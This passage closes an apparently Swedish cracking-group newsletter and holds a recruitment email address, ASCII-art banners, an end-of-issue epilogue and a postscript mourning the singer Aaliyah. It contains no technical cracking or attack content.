                 erfaren eller kunna något inom IT  :
                 maila då:
      
                    zipryz@polisen.nu
         
	         Och skriv i brevet vad du kan..
          
                    subject: alfaa member
	 .                                           .
	 .............................................
	 :      "Integrity? Never heard of it."      :
         :                                           :
  	 |,_________________________________________.|


 ############################################################################
#   _______ _   _____ _______ _______                () () () () () () ()    #
#  |   _   | | |  ___|   _   |   _   |                                       #
#  |  /_\  | | | |_  |  /_\  |  /_\  |                                       #
#  |  ___  | |_|___| |  ___  |  ___  |                                       #
#  |_|   |_|_____|   |_|   |_|_|   |_|     ......NEWS LETTER.........        #
#                                          Craqqing Is Here To Stay          #
 ############################################################################





INT 20

Programmet avlustades normalt.

VI VILL SÄGA SOM EPILOG ATT ÄVEN SOMMAREN TAR SLUT SÅ VARFÖR
SKULLE INTE DENNA UTGÅVA SLUTA.
Men jag vill inte sluta skriva...
Nej nu skärper jag mig och börjar skriva på 5:an istället.      
Den största genom tiderna.. Anl ialla fall.. >:-)

Ps. Hörde att Jan Axelsson hade dött men detta tror jag
dock inte på. Men tyvärr har alliya dött. I en:
Flygplans olycka. Det ska jag aldrig åka i.
De är smarta som utvecklade dem men jag vill inte
åka idem.
ALliya.. Vi tänker på dig. Nån gör väl det ialla fall.